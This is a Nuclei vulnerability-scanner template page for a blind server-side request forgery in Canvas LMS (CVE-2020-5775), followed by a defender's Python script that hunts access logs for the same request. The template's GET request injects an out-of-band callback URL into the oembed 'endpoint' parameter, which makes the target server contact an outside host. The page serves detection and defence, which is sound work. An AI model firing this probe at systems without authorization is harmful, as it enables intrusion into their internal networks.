Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery
ID: CVE-2020-5775
Severity: medium
Author: alph4byt3
Tags: cve,cve2020,ssrf,oast,blind,tenable,instructure
Description
Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
id: CVE-2020-5775

info:
  name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery
  author: alph4byt3
  severity: medium
  description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2020-49
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5775
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
    cvss-score: 5.8
    cve-id: CVE-2020-5775
    cwe-id: CWE-918
    epss-score: 0.00194
    epss-percentile: 0.57293
    cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: instructure
    product: canvas_learning_management_service
  tags: cve,cve2020,ssrf,oast,blind,tenable,instructure

http:
  - method: GET
    path:
      - "{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100a65f5d7390497288a21032229ed95c2dd83cb9773c1f3f53ef84dbe20205bb5c022100f2557349686c8a3c12a07f2a8b62fb04d4533c162ee262544dec7ad2e572c29a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-5775.yaml"
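
For defenders reviewing their own Canvas access logs, the request this template sends can be hunted for directly. The following is an added example, not part of the template or of Canvas: it flags GET requests to the oembed retrieval path whose `endpoint` parameter points at an internal address or at a host outside an allowlist. The allowlist contents, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

OEMBED_PATH = "/external_content/retrieve/oembed"   # path probed by the template
ALLOWED_HOSTS = {"www.youtube.com", "vimeo.com"}    # assumption: providers in use
# Common/combined log format: client, two fields, [time], "METHOD target PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def classify_endpoint(endpoint):
    """Return 'allowed', 'internal', 'unexpected-host' or 'malformed'."""
    try:
        parts = urlsplit(endpoint)
        host = parts.hostname
    except ValueError:
        return "malformed"
    if parts.scheme not in ("http", "https") or not host:
        return "malformed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a DNS name, not an IP literal
        if host == "localhost" or host.endswith((".local", ".internal")):
            return "internal"
        return "allowed" if host in ALLOWED_HOSTS else "unexpected-host"
    return "unexpected-host" if ip.is_global else "internal"

def find_oembed_ssrf(lines):
    """Return (client, endpoint, verdict) for each non-allowlisted endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        url = urlsplit(target)
        if method != "GET" or url.path != OEMBED_PATH:
            continue
        for endpoint in parse_qs(url.query).get("endpoint", []):
            verdict = classify_endpoint(endpoint)
            if verdict != "allowed":
                findings.append((client, endpoint, verdict))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2020:10:00:01 +0000] "GET /external_content/retrieve/oembed?endpoint=http://cb.example.net&url=foo HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Sep/2020:10:00:05 +0000] "GET /external_content/retrieve/oembed?endpoint=http%3A%2F%2F127.0.0.1%2Fstatus&url=foo HTTP/1.1" 200 40',
    '192.0.2.44 - - [01/Sep/2020:10:01:00 +0000] "GET /external_content/retrieve/oembed?endpoint=https://www.youtube.com/oembed&url=foo HTTP/1.1" 200 900',
    '192.0.2.44 - - [01/Sep/2020:10:01:02 +0000] "GET /courses/1 HTTP/1.1" 200 1200',
]
```

A hostname verdict reflects only the name as logged; a name that resolves to an internal address still needs a resolution-time check on the server side.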